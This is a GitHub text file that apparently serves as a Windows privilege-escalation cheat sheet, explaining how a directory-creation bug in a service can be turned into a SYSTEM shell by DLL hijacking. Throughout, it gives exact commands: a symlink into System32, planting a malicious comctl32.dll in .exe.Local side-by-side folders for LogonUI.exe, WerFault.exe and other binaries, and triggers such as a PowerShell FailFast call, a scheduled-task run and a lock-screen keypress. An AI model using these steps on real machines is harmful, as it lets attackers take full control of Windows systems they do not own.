-
Notifications
You must be signed in to change notification settings - Fork 75
/
Copy pathdir_create2system.txt
49 lines (29 loc) · 2.48 KB
/
dir_create2system.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
If you can create directory with FullControl access via service bugs, you can get SYSTEM shell from LogonUI.exe via dll hijacking.
Step 1. Create Directory in C:\windows\system32 as C:\Windows\System32\LogonUI.exe.Local .
createsymlink.exe C:\programdata\vulnlogs\somepath C:\Windows\System32\LogonUI.exe.Local
Then, you can create anything in C:\Windows\System32\LogonUI.exe.Local .
Step 2. Create directory in that folder.
mkdir C:\Windows\System32\LogonUI.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b
Step 3. Create/copy payload dll file in that folder as comctl32.dll.
copy malicious.dll C:\Windows\System32\LogonUI.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b\comctl32.dll
Step 4. Then restart or logon-logoff (winKey+ l). Your payload dll will execute as SYSTEM.
Thanks @PsiDragon for this advice.
Another Method by @jonasLyk
https://twitter.com/jonasLyk/status/1241314339623141376
https://twitter.com/404death/status/1240917568870731776
get SYSTEM shell from WerFault.exe via dll hijacking.
Same method with above.
1. create folder as C:\Windows\System32\WerFault.exe.Local via service bugs.
2. mkdir C:\Windows\System32\WerFault.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b
3. copy malicious.dll C:\Windows\System32\WerFault.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b\comctl32.dll
4. powershell -ep bypass -c "[Environment]::FailFast('Error')". Your payload dll will execute as SYSTEM.
-------------------
list process for directory create bug to system shell via comctl32.dll hijack like above methods.
1. C:\Windows\System32\consent.exe.Local (Triggered by running narrator.exe)
2. C:\Windows\System32\WerFault.exe.Local (Triggered by running powershell -ep bypass -c "[Environment]::FailFast('Error')" )
3. C:\Windows\System32\LogonUI.exe.Local (Triggered by running winkey+l)
4. C:\Windows\System32\Narrator.exe.Local (Triggered by running winkey+l ,Ease of access , WinKey+Ctrl+Enter)
5. C:\Windows\System32\Wermgr.exe.Local (triggered by schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\queueReporting")
5. ...... etc
https://github.com/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability/
Another exploitation tricks by James Forshaw : https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html